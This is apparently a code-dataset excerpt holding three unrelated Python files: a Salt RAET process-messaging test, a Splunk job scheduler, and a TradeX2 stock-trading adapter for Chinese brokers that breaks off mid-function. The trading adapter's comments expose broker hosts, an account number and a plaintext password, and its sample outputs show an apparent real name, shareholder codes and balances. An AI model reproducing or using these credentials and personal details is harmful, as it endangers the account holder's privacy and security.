source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
forking.py
|
# -*- coding: utf-8 -*-
'''
Test basic uxd stacking and yarding with multiprocesses
'''
import multiprocessing
import time
from salt.transport.road.raet import stacking
from salt.transport.road.raet import yarding
ESTATE = 'minion1'
def fudal():
'''
Make a single process raet uxd stack
'''
lord_stack = stacking.StackUxd(name='lord', lanename='execute', yid=0, dirpath='/tmp')
serf_stack = stacking.StackUxd(name='serf', lanename='execute', yid=1, dirpath='/tmp')
lord_yard = yarding.RemoteYard(yid=0, prefix='execute', dirpath='/tmp')
#serf_yard = yarding.Yard(name=serf_stack.yard.name, prefix='execute')
serf_stack.addRemoteYard(lord_yard)
#print 'stack: {0}\nyid: {1}\nname: {2}\nha: {3}\ndirpath: {4}'.format(lord_stack.yard.stack, lord_stack.yard.yid, lord_stack.yard.name, lord_stack.yard.ha, lord_stack.yard.dirpath)
#lord_stack.addRemoteYard(serf_yard)
src = (ESTATE, serf_stack.yard.name, None)
dst = (ESTATE, lord_stack.yard.name, None)
route = {'src': src, 'dst': dst}
msg = {'route': route, 'stuff': 'Serf to Lord, I am not a couch'}
serf_stack.transmit(msg=msg)
serf_stack.serviceAll()
lord_stack.serviceAll()
#print lord_stack.rxMsgs
def lord(serfs=5):
'''
Make a lord that can spawn serfs
'''
lord_yid = 0
dirpath = '/tmp'
lord_stack = stacking.StackUxd(name='lord', lanename='execute', yid=lord_yid, dirpath=dirpath)
lord_stack.serviceAll()
for serf_id in range(1, serfs + 1):
serf_yard = yarding.RemoteYard(yid=serf_id, prefix='execute', dirpath=dirpath)
lord_stack.addRemoteYard(serf_yard)
proc = multiprocessing.Process(target=serf, args=(lord_stack.yard.name, lord_yid, serf_id, dirpath))
proc.start()
while True:
lord_stack.serviceAll()
print 'serviced lord stack'
print lord_stack.rxMsgs
while lord_stack.rxMsgs:
rxmsg = lord_stack.rxMsgs.popleft()
print rxmsg
src = (ESTATE, lord_stack.yard.name, None)
dst = (ESTATE, rxmsg['route']['src'][1], None)
route = {'src': src, 'dst': dst}
msg = {'route': route, 'stuff': 'Master to Serf {0}, you stay'.format(rxmsg['route']['src'][1])}
lord_stack.transmit(msg)
print lord_stack.yards
time.sleep(1)
def serf(lord_name, lord_yid, id_, dirpath):
'''
Call to spawn a serf and start sending messages
'''
serf_stack = stacking.StackUxd(
name='serf{0}'.format(id_),
lanename='execute',
yid=id_,
dirpath=dirpath)
lord_yard = yarding.RemoteYard(yid=lord_yid, prefix='execute', dirpath=dirpath)
serf_stack.addRemoteYard(lord_yard)
src = (ESTATE, serf_stack.yard.name, None)
dst = (ESTATE, lord_name, None)
route = {'src': src, 'dst': dst}
msg = {'route': route, 'stuff': 'Serf {0} to Lord, I am not a couch'.format(id_)}
while True:
serf_stack.transmit(msg=msg)
serf_stack.serviceAll()
print 'serf messages transmitted'
while serf_stack.rxMsgs:
print serf_stack.rxMsgs.popleft()
time.sleep(1)
if __name__ == '__main__':
lord()
#fudal()
|
scheduler.py
|
# SPDX-FileCopyrightText: 2020 Splunk Inc.
#
# SPDX-License-Identifier: Apache-2.0
from future import standard_library
standard_library.install_aliases()
from builtins import object
import threading
from time import time
import random
import queue
from splunktalib.common import log
class Scheduler(object):
"""
A simple scheduler which schedules the periodic or once event
"""
import sortedcontainers as sc
max_delay_time = 60
def __init__(self):
self._jobs = Scheduler.sc.SortedSet()
self._wakeup_q = queue.Queue()
self._lock = threading.Lock()
self._thr = threading.Thread(target=self._do_jobs)
self._thr.deamon = True
self._started = False
def start(self):
"""
Start the schduler which will start the internal thread for scheduling
jobs. Please do tear_down when doing cleanup
"""
if self._started:
log.logger.info("Scheduler already started.")
return
self._started = True
self._thr.start()
def tear_down(self):
"""
Stop the schduler which will stop the internal thread for scheduling
jobs.
"""
if not self._started:
log.logger.info("Scheduler already tear down.")
return
self._wakeup_q.put(True)
def _do_jobs(self):
while 1:
(sleep_time, jobs) = self.get_ready_jobs()
self._do_execution(jobs)
try:
done = self._wakeup_q.get(timeout=sleep_time)
except queue.Empty:
pass
else:
if done:
break
self._started = False
log.logger.info("Scheduler exited.")
def get_ready_jobs(self):
"""
@return: a 2 element tuple. The first element is the next ready
duration. The second element is ready jobs list
"""
now = time()
ready_jobs = []
sleep_time = 1
with self._lock:
job_set = self._jobs
total_jobs = len(job_set)
for job in job_set:
if job.get_expiration() <= now:
ready_jobs.append(job)
if ready_jobs:
del job_set[: len(ready_jobs)]
for job in ready_jobs:
if job.get_interval() != 0 and not job.stopped():
# repeated job, calculate next due time and enqueue
job.update_expiration()
job_set.add(job)
if job_set:
sleep_time = job_set[0].get_expiration() - now
if sleep_time < 0:
log.logger.warn("Scheduler satuation, sleep_time=%s", sleep_time)
sleep_time = 0.1
if ready_jobs:
log.logger.info(
"Get %d ready jobs, next duration is %f, "
"and there are %s jobs scheduling",
len(ready_jobs),
sleep_time,
total_jobs,
)
ready_jobs.sort(key=lambda job: job.get("priority", 0), reverse=True)
return (sleep_time, ready_jobs)
def add_jobs(self, jobs):
with self._lock:
now = time()
job_set = self._jobs
for job in jobs:
delay_time = random.randrange(0, self.max_delay_time)
job.set_initial_due_time(now + delay_time)
job_set.add(job)
self._wakeup()
def update_jobs(self, jobs):
with self._lock:
job_set = self._jobs
for njob in jobs:
job_set.discard(njob)
job_set.add(njob)
self._wakeup()
def remove_jobs(self, jobs):
with self._lock:
job_set = self._jobs
for njob in jobs:
njob.stop()
job_set.discard(njob)
self._wakeup()
def number_of_jobs(self):
with self._lock:
return len(self._jobs)
def disable_randomization(self):
self.max_delay_time = 1
def _wakeup(self):
self._wakeup_q.put(None)
def _do_execution(self, jobs):
for job in jobs:
job()
|
tdx.py
|
#coding:utf-8
"""
tradex 行情和交易适配
"""
"""
量化技术指标计算
https://github.com/QUANTAXIS/QUANTAXIS/blob/master/QUANTAXIS/QAData/base_datastruct.py
"""
import copy
import time,datetime
import traceback
import threading
from collections import OrderedDict
from functools import partial
from dateutil.parser import parse
from mantis.sg.fisher.utils.importutils import import_module,import_class
from mantis.sg.fisher.utils.useful import singleton
from mantis.sg.fisher.utils.timeutils import timestamp_to_str
from mantis.sg.fisher import stbase,stutils
import TradeX2
#
# TDX_CFGS = dict(
# qsid = 36,
# host = "222.173.22.53",
# port = 7700,
# version = "2.03",
# branch_id = 0,
# account_type = 0,
# account_no = "100201003789",
# trade_account_no = "100201003789",
# password = "171025",
# tx_password = "",
# client_account = "100201003789",
# broker_account = "100201003789"
# )
#
#
# TDX_CFGS_TRADE = dict(
# qsid = 36,
# host = "58.57.121.98",
# port = 7700,
# version = "2.13",
# branch_id = 0,
# account_type = 0,
# account_no = "100201003789",
# trade_account_no = "100201003789",
# password = "171025",
# tx_password = "",
# client_account = "100201003789",
# broker_account = "100201003789"
# )
#
# # 中泰极速通
# TDX_CFGS_TRADE_XTP = dict(
# qsid = 36,
# host = "222.173.22.75",
# port = 7888,
# version = "6.11",
# branch_id = 0,
# account_type = 8,
# account_no = "100201003789",
# trade_account_no = "100201003789",
# password = "171025",
# tx_password = "",
# client_account = "100201003789",
# broker_account = "100201003789"
# )
Market_SH = 1
Market_SZ = 0
Market_NULL = 99
def getMaketTypeByCode(code):
if not code:
return Market_NULL
if code[0] in ('0','3'):
return Market_SZ
return Market_SH
class TDX_StockMarket(stbase.Market):
"""行情接口"""
def __init__(self):
# self.ctx = {}
self.hq_conn = None
stbase.Market.__init__(self, None)
self.logger = None
self.cfgs = { 'query_freq':.5}
# self.cfgs.update(TDX_CFGS)
self.tick_codes = {} # {code:{last:???} }
self.bar_last_data = {} # { code-cycle:??? } 消重处理,记录最新的一条bar记录
self.bar_codes= {
"1m":[],
"5m":[],
"15m":[],
"30m":[],
"60m":[],
"d":[]
}
# self.codes =[] # 订阅的股票列表
self.thread_quotes = threading.Thread(target=self.quotesThread)
def init(self,*args, **kwargs ):
"""
host : 行情服务器地址
port : 行情服务器端口
:return:
"""
self.logger = stbase.controller.getLogger()
self.cfgs.update(kwargs)
stbase.Market.init(self)
return self
def open(self):
if not self.connectQuoteServer():
return False
stbase.Market.open(self)
self.thread_quotes.start()
return True
def connectQuoteServer(self):
self.hq_conn = None
try:
host = self.cfgs.get('quote_host')
port = self.cfgs.get('quote_port')
self.logger.info('Connect To HQ server..')
self.hq_conn = TradeX2.TdxHq_Connect(host, port)
except TradeX2.TdxHq_error, e:
self.logger.error( e.message.decode('gbk').encode('utf8') )
self.logger.info('HQ Server Connected.')
return self.hq_conn
def close(self):
stbase.Market.close(self)
self.thread_quotes.join()
def quotesThread(self):
"""行情查询 线程"""
freqs = self.cfgs.get('query_freq')
while self.actived:
time.sleep(freqs)
try:
if not self.hq_conn:
self.connectQuoteServer()
self.quoteBar()
self.quoteTick()
except:
self.hq_conn = None
self.logger.error( traceback.print_exc() )
def quoteTick(self):
"""分时数据"""
qs = []
if not self.tick_codes:
return
for code in self.tick_codes.keys():
qs.append( (getMaketTypeByCode(code),code) )
#查询行情记录
errinfo, count, result = self.hq_conn.GetSecurityQuotes(qs)
if errinfo != "":
print errinfo.decode('gbk')
self.hq_conn = None
else:
# print count
lines = result.decode('gbk').split("\n")
# print lines[0]
for line in lines[1:]:
# print line
self.on_tick(line.split())
def quoteBar(self):
"""查询k线"""
cycle_cat_map = {
'1m': 8,
'5m': 0,
'15m': 1,
'30m': 2,
'60m': 3,
'd': 4,
'w': 5,
'm': 6,
'q': 10,
'y': 11
}
for k,codes in self.bar_codes.items():
for code in codes:
cat = cycle_cat_map[k]
market = getMaketTypeByCode(code)
# 获取最新的一根k线
errinfo, count, result = self.hq_conn.GetSecurityBars(cat,market,code,0,2)
if errinfo != "":
print errinfo.decode('gbk')
self.hq_conn = None
else:
# print result.decode('gbk')
lines = result.decode('gbk').split("\n")
# print lines[0]
for line in lines[1:2]: # 不包含当前分钟动态变化的k线
# print line
self.on_bar(code,k,line.split('\t'))
def initTradeObject(self,stock):
"""
:param stock: stbase.TradeObject
:return:
"""
# 初始化股票的初始参数, 交易限价、手续费等等
if stock.inited:
return
# stk = self.ctx.Market.Stk(stock.code)
#
# stock.max_price = stk.MaxOrderPrice
# stock.min_price = stk.MinOrderPrice
# stock.stk = stk
stock.inited = True
return stock
def getHistoryBars(self,code,cycle='1m',limit=100,inc_last=False):
"""获取历史k线
剔除最后一根活动k线(盘中不能使用最后一根k线,或许是未完成计算的中间结果)
result 以时间升序排列
"""
result = [] # stbase.BarData()
stock= self.product.getOrNewTradeObject(code)
cycle_cat_map = {
'1m': 8,'5m': 0,'15m': 1,
'30m': 2,'60m': 3,'d': 4,
'w': 5,'m': 6,'q': 10,
'y': 11
}
cat = cycle_cat_map[cycle]
market = getMaketTypeByCode(code)
errinfo, count, text = self.hq_conn.GetSecurityBars(cat, market, code, 0, limit+1)
if errinfo != "":
print errinfo.decode('gbk')
self.hq_conn = None
else:
lines = text.decode('gbk').split("\n")
# print lines[0]
for line in lines[1:-1]: # 不包含当前分钟动态变化的k线
data = self.barWrapped(code, cycle, line.split('\t'))
result.append(data)
return result
def getYdClosePrice(self,code):
"""查詢昨日 收盤價
? 如果盤后查詢,則取最後一根而不是倒數第二
"""
stock = stbase.stocks.getTradeObject(code)
return stock.yd_close
# if not stutils.Stocks.in_trading_time():
# stbase.println(" not in trading time ..")
# return self.getHistoryBars(code,'d', 2,True)[-1].Close
# return self.getHistoryBars(code,'d', 2)[-1].Close
def subReset(self):
stbase.Market.subReset(self)
self.tick_codes = {}
self.bar_codes = {
"1m":[],
"5m":[],
"15m":[],
"30m":[],
"60m":[],
"d":[]
}
self.bar_last_data = {}
return self
def subTick(self, code, handler):
"""订阅分时行情"""
stock = stbase.Market.subTick(self, code, handler)
# stock.stk.OnTick += partial(self.on_tick, stock)
self.tick_codes[code]= {'last':None}
return stock
def subBar(self,code,handler,cycle='1m'):
"""订阅不同周期的k线事件"""
stock = stbase.Market.subBar(self, code, handler, cycle)
self.bar_codes[cycle].append(code)
name ='{}-{}'.format(code,cycle)
self.bar_last_data[name] = {'last':None}
return stock
#市场 代码 活跃度 现价3 昨收 开盘 最高 最低7 保留 保留 总量10 现量11 总金额12 内盘13 外盘14 保留 保留 买一价17 卖一价 买一量 卖一量20 买二价 卖二价 买二量 卖二量 买三价25 卖三价 买三量 卖三量 买四价 卖四价30 买四量 卖四量 买五价 卖五价 买五量35 卖五量 保留 保留 保留 保留40 保留 涨速 活跃度43
#0 002517 3201 4.980000 5.070000 5.080000 5.080000 4.840000 14330103 -498 481362 37 238152352.000000 286382 194980 -1 10460 4.980000 4.990000 614 1192 4.970000 5.000000 2051 2672 4.960000 5.010000 1976 3221 4.950000 5.020000 1312 2015 4.940000 5.030000 430 1547 1593 0 30 24 -1 0.610000 3201
def on_tick(self, qs):
"""行情进入,生成 TickData()对象,推送到 stbase.Market的处理工作队列
主动查询需要控制tick上报时消重
"""
code = qs[1]
last = self.tick_codes[code].get('last')
current = ','.join(qs)
if last == current:
# print 'duplicated tick.'
return
self.tick_codes[code]['last'] = current
vs = map(float, qs)
data = stbase.TickData()
data.code = code
data.trade_object = stbase.stocks.getOrNewTradeObject(code)
data.sys_time = datetime.datetime.now()
price = data.price
price.time = data.sys_time
price.last = vs[3]
price.yd_close = vs[4]
price.qty = vs[11]
price.amount = 0
price.total_qty = vs[10]
price.total_amount = vs[12]
price.diff = price.last - price.yd_close # 当前价差
price.diff_rate = price.diff/(price.yd_close*1.0)
price.sell_1 = vs[18]
price.sell_2 = vs[22]
price.sell_3 = vs[26]
price.sell_4 = vs[30]
price.sell_5 = vs[34]
price.sell_qty_1 = vs[20]
price.sell_qty_2 = vs[24]
price.sell_qty_3 = vs[28]
price.sell_qty_4 = vs[32]
price.sell_qty_5 = vs[36]
price.buy_1 = vs[17]
price.buy_2 = vs[21]
price.buy_3 = vs[25]
price.buy_4 = vs[29]
price.buy_5 = vs[33]
price.buy_qty_1 = vs[19]
price.buy_qty_2 = vs[23]
price.buy_qty_3 = vs[27]
price.buy_qty_4 = vs[31]
price.buy_qty_5 = vs[35]
data.trade_object.price = data.price
self.putData(data) # 置入处理队列等待线程读取
def barWrapped(self,code,cycle,kdata):
name = '{}-{}'.format(code, cycle)
last = self.bar_last_data[name].get('last')
current = ','.join(kdata)
if last == current:
return
self.bar_last_data[name]['last'] = current
dt = kdata[0]
dt = parse(dt)
nums = kdata[1:]
nums = map(float, nums)
data = stbase.BarData()
data.amount = nums[5]
data.open = nums[0]
data.high = nums[2]
data.low = nums[3]
data.close = nums[1]
data.vol = nums[4]
data.time = dt
data.sys_time = datetime.datetime.now()
data.code = code
data.trade_object = stbase.stocks.getTradeObject(code)
data.cycle = cycle
return data
def on_bar(self,code,cycle,kdata):
"""k线数据触发, 消重处理"""
# data.num = num # bar的最大流水
data = self.barWrapped(code,cycle,kdata)
self.putData(data)
class TDX_StockTrader(stbase.Trader):
"""股票交易接口"""
def __init__(self):
stbase.Trader.__init__(self)
self.trade_conn = None # 交易通道
self.logger = None
self.cfgs = {'query_freq': .5}
# self.cfgs.update(TDX_CFGS_TRADE)
self.thread_query = threading.Thread(target=self.queryThread)
self.actived = False
self.position_list = {} # 持仓记录
self.gddm_list = {} # 股东代码列表
self.orders = {} # 委托中的订单
def init(self,*args,**kwargs):
self.logger = stbase.controller.getLogger()
self.cfgs.update(kwargs)
stbase.Trader.init(self,**kwargs)
return self
def open(self):
# 开始行情接收
# if not self.connectServer():
# return False
#
self.connectServer()
stbase.Trader.open(self)
self.thread_query.start()
return True
def close(self):
self.actived = False
self.thread_query.join()
def wait_for_shutdown(self,inf = 1000*1000):
time.sleep(inf)
def connectServer(self):
self.trade_conn = None
try:
host = self.cfgs.get('host')
port = self.cfgs.get('port')
qsid = self.cfgs.get('qsid')
version = self.cfgs.get('version')
branch_id = self.cfgs.get('branch_id')
account_type = self.cfgs.get('account_type')
account_no = self.cfgs.get('account_no')
trade_account_no = self.cfgs.get('trade_account_no')
password = self.cfgs.get('password')
tx_password = self.cfgs.get('tx_password')
client_account = self.cfgs.get('client_account')
broker_account = self.cfgs.get('broker_account')
self.logger.info('Connect To HQ server..')
TradeX2.OpenTdx(14, "6.40", 12, 0)
self.trade_conn = TradeX2.Logon(qsid, host, port, version, branch_id, account_type, client_account, broker_account,
password, tx_password)
except TradeX2.error, e:
print e.message.decode('gbk')
self.logger.error(e.message.decode('gbk').encode('utf8'))
return None
self.logger.info('HQ Server Connected.')
return self.trade_conn
def queryThread(self):
"""查询持仓、资金、委托"""
self.actived = True
freqs = self.cfgs.get('query_freq')
while self.actived:
time.sleep(freqs)
try:
if not self.trade_conn:
self.connectServer()
self.queryDatas()
except:
self.trade_conn = None
self.logger.error(traceback.print_exc())
def queryDatas(self):
"""
查询各类持仓、订单、委托等信息
:return:
"""
# 0 资金
# 1 股份
# 2 当日委托
# 3 当日成交
# 4 可撤单
# 5 股东代码
# 6 融资余额
# 7 融券余额
# 8 可融证券
categories = ( 0, 1,2,3,4,5)
categories = ( 0,1,2,3,4,5 )
categories = ( 0,1,4,5)
# categories = ( 5,)
functions = {
0 : self.query_resp_funds,
1 : self.query_resp_postions,
# 2 : self.query_resp_today_orders,
4 : self.query_resp_cancelable_orders,
5: self.query_resp_gddm
}
# status, content = self.trade_conn.QueryDatas(categories)
# if status < 0:
# print content.decode('gbk')
# self.trade_conn = None # 要求重连
# else:
# for elem in content:
for n in categories:
if n == 5 and self.gddm_list: # 股东代码已经查询就无需再查了
continue
errinfo, result = self.trade_conn.QueryData(n)
if errinfo :
print errinfo.decode('gbk')
# self.trade_conn = None # 要求重连
else:
# print n
# print result.decode('gbk')
lines = result.decode('gbk').split("\n")
functions[n](lines[1:])
def get_field_value(self,value,def_=0):
value = value.strip()
ret = def_
# print 'get_value:' , value
if value:
ret = float(value)
return ret
def query_resp_today_orders(self,lines):
"""查询当日委托"""
lines = map(lambda _: _.strip(), lines)
lines = filter(lambda _: _, lines)
self.orders = {}
for line in lines:
fs = line.split('\t')
# print len(fs)
order = stbase.OrderRecord()
order.code = fs[11]
order.name = fs[0]
order.gddm = fs[12]
order.direction = stbase.Constants.Buy
if fs[1] == u'卖':
order.direction = stbase.Constants.Sell
order.order_id = fs[9]
order.trans_id = ''
order.order_price = self.get_field_value(fs[3])
order.order_qty = int(self.get_field_value(fs[4]))
order.qty_filled = int(self.get_field_value(fs[6]))
order.qty_withdraw = 0 # int(self.get_field_value(fs[11]))
self.orders[order.order_id] = order
"""
- 东方证券 -
证券名称0 买卖标志1 买卖标志2 委托价格3 委托数量4 成交均价5 成交数量6 状态说明7 委托时间8 委托编号9 申报序号10 证券代码11 股东代码12 帐号类别13 备注 可撤单标志 交易所代码 撤单数量 委托属性 委托状态 保留信息
恺英网络 买 0 4.550 400 4.550 400 已成交 09:30:55 167 H700000032 002517 0261758179 0 0 2 0 已成交
恺英网络 卖 1 4.680 400 4.680 400 已成交 09:47:40 170 H700000108 002517 0261758179 0 0 2 0 已成交
恺英网络 卖 1 5.000 200 0.000 0 场内撤单 09:58:58 172 H700000151 002517 0261758179 0 0 2 200 场内撤单
辰欣药业 卖 1 18.170 200 18.170 200 已成交 10:03:01 174 0600000314 603367 A451079901 1 0 1 0 已成交
恺英网络 买 0 4.480 200 0.000 0 未成交 14:31:17 178 H700000431 002517 0261758179 0 1 2 0 已报
恺英网络 卖 1 4.830 200 0.000 0 未成交 14:48:03 182 H700000473 002517 0261758179 0 1 2 0 已报
"""
def query_resp_cancelable_orders(self,lines):
"""查询可撤销的委托"""
lines = map(lambda _: _.strip(), lines)
lines = filter(lambda _: _, lines)
self.orders = {}
for line in lines:
fs = line.split('\t')
# print len(fs)
# for i, _ in enumerate(fs):
# print i, _.encode('utf-8')
if self.cfgs.get('broker_name') == 'AIJIAN':
order = stbase.OrderRecord()
order.code = fs[1]
order.name = fs[2]
order.gddm = fs[13]
order.direction = stbase.Constants.Buy
if fs[4] == u'卖出':
order.direction = stbase.Constants.Sell
order.order_id = fs[8]
order.trans_id = ''
order.order_price = self.get_field_value(fs[6])
order.order_qty = int(self.get_field_value(fs[7]))
order.qty_filled = int(self.get_field_value(fs[10]))
order.qty_withdraw = int(self.get_field_value(fs[11]))
self.orders[order.order_id] = order
# print order.dict()
"""
0 09:52:30
1 002517
2 恺英网络
3 0
4 买入
5 已报
6 3.7000
7 200
8 51
9 0.0000
10 0
11 0
12 买卖
13 0237617162
14 委托
15 0
16 0
17
18 08D92910
"""
if self.cfgs.get('broker_name') == 'DONGFANG':
order = stbase.OrderRecord()
order.code = fs[11]
order.name = fs[0]
order.gddm = fs[12]
order.direction = stbase.Constants.Buy
if fs[1] == u'卖':
order.direction = stbase.Constants.Sell
order.order_id = fs[9]
order.trans_id = ''
order.order_price = self.get_field_value(fs[3])
order.order_qty = int(self.get_field_value(fs[4]))
order.qty_filled = int(self.get_field_value(fs[6]))
order.qty_withdraw = 0 #int(self.get_field_value(fs[11]))
self.orders[order.order_id] = order
# print order.dict()
# print 'query order cancellable end.'
"""
** 注意 : 不同的证券通道返回的格式均不同
- 东方证券 -
证券名称0 买卖标志1 买卖标志2 委托价格3 委托数量4 成交价格5 成交数量6 状态说明7 委托时间8 委托编号9 申报序号10 证券代码11 股东代码12 帐号类别13 备注 交易所代码 委托状态 保留信息
恺英网络 卖 1 5.000 200 0.000 0 未成交 09:58:58 172 H700000151 002517 0261758179 0 2 已报
"""
"""
委托日期0 委托时间1 证券代码2 证券名称3 状态说明4 买卖标志5
买卖标志6 委托价格7 委托数量8 委托编号9 成交数量10 撤单数量11 股东代码12 帐号类别13
资金帐号14 备注 句柄 保留信息
"""
def query_resp_gddm(self,lines):
"""股东代码查询返回"""
lines = map(lambda _: _.strip(), lines)
lines = filter(lambda _: _, lines)
self.gddm_list = {}
for line in lines:
fs = line.split('\t')
# print len(fs)
name = fs[0]
type_ = int(fs[2])
# for i, _ in enumerate(fs):
# print i, _.encode('utf-8')
self.gddm_list[type_] = fs[0]
# _ = self.gddm_list.get(type_)
# if not _:
# self.gddm_list[type_] = []
# _ = self.gddm_list.get(type_)
#
# type_.append( fs[0])
# print self.gddm_list
"""
- 东方证券 -
股东代码0 股东名称1 帐号类别2 资金帐号3 指定交易4 保留信息
A451079901 XXX 1 06034051 0
0261758179 XXX 0 06034051 0
- 中泰证券 -
股东代码0 股东名称1 帐号类别2 资金帐号3 融资融券标识4 指定交易5 句柄 保留信息
0252085695 孙鹏 0 0 0 0 0741E2D0 主股东
A338780150 孙鹏 1 0 0 1 0741E2D0 主股东
0571803172 孙鹏 0 0 0 0 0741E2D0
F138928144 孙鹏 1 0 0 1 0741E2D0
"""
def query_resp_postions(self,lines):
"""持仓返回"""
lines = map(lambda _: _.strip(), lines)
lines = filter(lambda _: _, lines)
self.position_list = {}
for line in lines:
fs = line.split('\t')
# print len(fs)
# for i,_ in enumerate(fs):
# print i , _.encode('utf-8')
if self.cfgs.get('broker_name') == 'AIJIAN':
pos = TdxPosition()
pos.code = fs[0]
pos.name = fs[1]
pos.qty_current = self.get_field_value(fs[2])
pos.qty_pos = pos.qty_current
# pos.qty_td = pos.qty_current
pos.qty_yd = self.get_field_value(fs[3])
pos.qty_td = pos.qty_current - pos.qty_yd
pos.last_price = self.get_field_value(fs[7])
pos.gddm = fs[10]
self.position_list[pos.code] = pos
# print pos.dict()
"""
0 002517
1 恺英网络
2 700
3 200
4 -62.940
5 3.999
6 -1.98
7 3.920
8 2744.000
9 深圳A股
10 0237617162
11 0
12 0
13 16711680
14
15 08D4DA28
"""
if self.cfgs.get('broker_name') == 'DONGFANG':
pos = TdxPosition()
pos.code = fs[0]
pos.name = fs[1]
pos.qty_current = self.get_field_value(fs[2])
pos.qty_yd = self.get_field_value(fs[4])
pos.last_price = self.get_field_value(fs[8])
pos.gddm = fs[12]
self.position_list[pos.code] = pos
# print pos.dict()
"""
- 爱建证券 -
证券名称 证券数量 可卖数量 成本价 浮动盈亏 盈亏比例(%) 最新市值 当前价 今买数量 今卖数量 证券代码 股东代码 帐号类别 交易所代码 备注 保留信息
恺英网络 4200 2900 4.219 -1255.000 -7.09 16464.000 3.920 002517 0261758179 0 0 开仓证券
- 东方证券 -
证券名称 证券数量 可卖数量 成本价 浮动盈亏 盈亏比例(%) 最新市值 当前价 今买数量 今卖数量 证券代码 股东代码 帐号类别 交易所代码 备注 保留信息
辰欣药业 0 0 0.000 -50.780 0.00 0.000 18.420 603367 A451079901 1 1 开仓证券
恺英网络 600 0 7.016 -1305.460 -31.01 2904.000 4.840 002517 0261758179 0 0 开仓证券
- 中泰证券 -
18
证券代码0 证券名称1 证券数量2 库存数量3 可卖数量4 余券数量5 参考成本价6 盈亏成本价7 当前价8 参考市值9 参考盈亏10 参考盈亏比例(%)11 股东代码12 帐号类别13 交易所代码14 资金帐号15 交易所名称16 句柄 保留信息
600010 包钢股份 100 100 100 1.840 1.840 1.790 179.000 -5.000 -2.72 A338780150 1 1 100201003789 上海A股 073F5720
"""
def query_resp_funds(self, lines):
"""资金返回"""
lines = map(lambda _:_.strip(),lines)
lines = filter(lambda _:_,lines)
for line in lines:
fs = line.strip().split('\t')
# print len(fs)
# for i, _ in enumerate(fs):
# print i, _.encode('utf-8')
if self.cfgs.get('broker_name') == 'AIJIAN':
if fs[0] == '0': # 人民币
self.stat.balance = self.get_field_value(fs[1])
self.stat.usable_amount = self.get_field_value(fs[2])
self.stat.frozen_amount = 0 # self.get_field_value(fs[4])
self.stat.drawable_amount = self.get_field_value(fs[4])
self.stat.reference_value = self.get_field_value(fs[6])
self.stat.asset_amount = self.get_field_value(fs[5])
"""
0 0
1 39027.39
2 37057.29
3 0.00
4 37057.29
5 39801.29
6 2744.00
7
8 08C3ECD8
"""
if self.cfgs.get('broker_name') == 'DONGFANG':
if fs[0] == '0': # 人民币
self.stat.balance = self.get_field_value(fs[1])
self.stat.usable_amount = self.get_field_value(fs[2])
self.stat.frozen_amount = self.get_field_value(fs[3])
self.stat.drawable_amount = self.get_field_value(fs[5])
self.stat.reference_value = 0 # self.get_field_value(fs[6])
self.stat.asset_amount = self.get_field_value(fs[4])
# self.stat.frozen_buy = self.get_field_value(fs[8])
# self.stat.frozen_sell = self.get_field_value(fs[9])
"""
- 东方证券 -
币种0 资金余额1 可用资金2 冻结资金3 总资产4 可取资金5 融资金额6 模式7 最新市值8 融资负债 融券负债 保留信息
0 7034.290 9798.720 901.000 13591.720 7034.290 0 2892.000 0.000 0.000
1 0.000 0.000 0.000 0.000 0.000 0 0.000 0.000 0.000
2 0.000 0.000 0.000 0.000 0.000 0 0.000 0.000 0.000
- 中泰证券 -
资金帐号0 币种1 资金余额2 可用资金3 冻结资金4 可取资金5 参考市值6 总资产7 买入冻结资金8 卖出冻结资金9 取柜台可买数量10 账户信用值11 可用信用额度12 句柄 保留信息
100201003789 0 750.71 0.00 0.00 750.71 750.71 0.00 0 0741DFC0
"""
def onRtsChanged(self,rts_list):
"""委托或成交回报"""
fmt = '%Y-%m-%d %H:%M:%S'
tr_list = []
for _ in rts_list:
tr = stbase.TradeReturn()
tr.type = _.Type
tr.order_id = _.OrigSerialNo
tr.user_id = _.OrigSource
tr.protfolio_num = _.PortfolioNum
tr.code = _.ServerCode
tr.direction = stbase.Constants.Buy
if _.BSType == 'S':
tr.direction = stbase.Constants.Sell
tr.oc = stbase.Constants.Open
if _.OCFlag == 'C':
tr.oc = stbase.Constants.Cover
tr.order_price = _.OrderPrice
tr.order_qty = _.OrderQty
# print _.OrderTime,type(_.OrderTime)
if _.OrderTime:
tr.order_time = datetime.datetime.fromtimestamp(_.OrderTime)
if _.KnockTime:
tr.knock_time = datetime.datetime.fromtimestamp(_.KnockTime)
tr.knock_code = _.KnockCode
tr.knock_price = _.KnockPrice
tr.knock_qty = _.KnockQty
tr.knock_amount = _.KnockAmt
tr.total_withdraw_qty = _.TotalWithdrawQty
tr.total_knock_qty = _.TotalKnockQty
tr.total_knock_amount = _.TotalKnockAmt
tr.status = stbase.Constants.OrderStatus.Unknown
if _.StatusCode == 'Registered':
tr.status = stbase.Constants.OrderStatus.Registered
elif _.StatusCode == 'Pending_Dealing':
tr.status = stbase.Constants.OrderStatus.Pending_Dealing
elif _.StatusCode == 'Rejected':
tr.status = stbase.Constants.OrderStatus.Rejected
elif _.StatusCode == 'Pending_Cancel':
tr.status = stbase.Constants.OrderStatus.Pending_Cancel
elif _.StatusCode == 'Cancelled':
tr.status = stbase.Constants.OrderStatus.Cancelled
elif _.StatusCode == 'Partially_Pending_Cancel':
tr.status = stbase.Constants.OrderStatus.Partial_Pending_Cancel
elif _.StatusCode == 'Partially_Cancelled':
tr.status = stbase.Constants.OrderStatus.Partial_Cancelled
elif _.StatusCode == 'Partially_Filled':
tr.status = stbase.Constants.OrderStatus.Partial_Filled
elif _.StatusCode == 'Fully_Filled':
tr.status = stbase.Constants.OrderStatus.Fully_Filled
elif _.StatusCode == 'Auditing':
tr.status = stbase.Constants.OrderStatus.Auditing
elif _.StatusCode == 'AuditError':
tr.status = stbase.Constants.OrderStatus.AuditError
tr_list.append(tr)
stbase.Trader.onRtsChanged(self, tr_list)
# stbase.println('onRtsChanged(), size:%s'%(len(rts_list)))
def onPositionChanged(self):
# 持仓和资金变更通知
stbase.Trader.onPositionChanged(self)
# stbase.println('onPositionChanged() , ')
def get_gddm(self,code):
"""获得股东代码"""
return ''
def sendOrder(self, order_req = stbase.OrderRequest(code='')):
"""发送订单
:param: order_req : stbase.OrderRequest
"""
# 0 买入
# 1 卖出
Buy = 0
Sell = 1
direction = Buy
if order_req.direction == stbase.Constants.Sell:
direction = Sell
# print order_req.dict()
"""
委托报价方式
0 限价委托; 上海限价委托 / 深圳限价委托
1 市价委托(深圳对方最优价格)
2 市价委托(深圳本方最优价格)
3 市价委托(深圳即时成交剩余撤销)
